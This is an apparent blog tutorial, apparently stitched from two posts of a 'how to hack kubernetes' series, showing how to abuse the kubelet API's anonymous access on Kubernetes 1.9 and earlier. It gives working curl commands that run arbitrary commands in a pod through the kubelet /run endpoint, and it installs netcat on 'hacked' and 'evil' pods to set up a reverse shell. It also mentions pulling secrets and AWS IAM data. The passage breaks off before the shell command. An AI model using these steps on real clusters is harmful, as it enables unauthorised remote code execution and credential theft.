Hi everyone, in today's post I am going to explain how to ssh into the worker node where the pod is hosted. In order to do this, you need to be able to complete part 1 of this tutorial, if you have not seen yet, please do before watching this one.
Now that you are inside the hacked pod with ssh connection, let's try to mount the root volume for the worker node where this pod is running. You should be able to this as it's enabled by default, if the sysadmin didn't changed it, you are good to go. You need this file and the permission to launch pods from inside the hacked pod, again, if that pod is using the default service account you should be able to do it.
Hello everyone, it's been a while since my last post, main reason is because there was nothing interesting to post until now :) I will be posting a series of posts on how to hack kubernetes since this is a hot topic at the moment.
Kubelet api by default allows to be accessed with anonymous auth, no keys , no password, nothing is needed.
This is what you are going to need to reproduce this :
1) Running kubernetes <=1.9 , it has been fixed on version 1.10: https://github.com/kubernetes/kubernetes/pull/59666
2) Kubelet api port must be exposed to the internet or to your local network, the port 10255 and 10250
3) rbac rules misconfigured or not even present.
4) A cluster to test, I recommend installing minikube.
5) You need to find a container that is not read only to install stuff, but even if it's not read only, you can get a lot of info from it like secrets and aws iam information.
So, let's do this, I did this on minikube just to play and prove the concept. That's the easiest way to play with this vulnerability. So go ahead and install minikube or you can run this on your cluster.
Once you have your minikube installed , you need to the ip address, get it with
angelo http://poc-hack.blogspot.co.uk/:~ minikube ip
Mine is 192,.168.99.100, yours might be different. In order to do the curl's below, you are going to need the pod name and the id.
So let's launch 2 pods, one with the vulnerable host and the other one that will be waiting our reverse shell.
1) Launch the evil container that will be listening for our reverse shell.
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run evil --image=centos -it /bin/bash
2) Lauch the hacked container that we will use to hack into.
angelo http://poc-hack.blogspot.co.uk/:~ kubectl run hacked --image=centos -it /bin/bash
The pod name is "hacked" and the pod id you can get with :
angelo http://poc-hack.blogspot.co.uk/:~ kubectl get pods
NAME READY STATUS RESTARTS AGE
hacked-65d6998b6c-rgl28 1/1 Running 1 48m
evil-7d7fff7d4c-5lmfz 1/1 Running 1 1
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28"
If you are wondering how are you going to get this information from outside, this is how :
In my case, that command would translate to 192.168.99.100 because that's my minikube ip, in a real case scenario, that would be the ip of the master node and this is to get the pod names:
From the command above you can get the pod id and name.
Now let's get into the interesting part.
Open 3 tabs on your terminal, one with a shell on the hacked container, one on the evil container and another one where you are going to run lots of curl commands.
The first thing you are going to do is to create a file a test. Run this on your localhost.
Alright, now that we know that all is well and working, let's install nc on that hacked box, so we can launch a reverse shell:
1) Install nc in case it's not there yet.
angelo http://poc-hack.blogspot.co.uk/:~ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
2) Do the same for the evil container (execute this on your localhost):
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
(4/4): base/7/x86_64/primary_db | 5.7 MB 00:00:26
Determining fastest mirrors
* base: mirror.econdc.com
* extras: mirrors.coreix.net
* updates: mirror.econdc.com
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Processing Dependency: libpcap.so.1()(64bit) for package: 2:nmap-ncat-6.40-7.el7.x86_64
--> Running transaction check
---> Package libpcap.x86_64 14:1.5.3-9.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=================================================================================================================================================================
Package Arch Version Repository Size
=================================================================================================================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Installing for dependencies:
libpcap x86_64 14:1.5.3-9.el7 base 138 k
Transaction Summary
=================================================================================================================================================================
Install 1 Package (+1 Dependent package)
Total download size: 338 k
Installed size: 731 k
Downloading packages:
warning: /var/cache/yum/x86_64/7/base/packages/nmap-ncat-6.40-7.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for nmap-ncat-6.40-7.el7.x86_64.rpm is not installed
(1/2): nmap-ncat-6.40-7.el7.x86_64.rpm | 201 kB 00:00:00
(2/2): libpcap-1.5.3-9.el7.x86_64.rpm | 138 kB 00:00:04
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
Total 82 kB/s | 338 kB 00:00:04
Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) "
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 14:libpcap-1.5.3-9.el7.x86_64 1/2
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 2/2
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/2
Verifying : 14:libpcap-1.5.3-9.el7.x86_64 2/2
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Dependency Installed:
libpcap.x86_64 14:1.5.3-9.el7
Complete!
3) Prepare the reverse shell connection on your evil host (execute this on your evil container, you need to get the ip address, so you can use on the other container to connect to this one: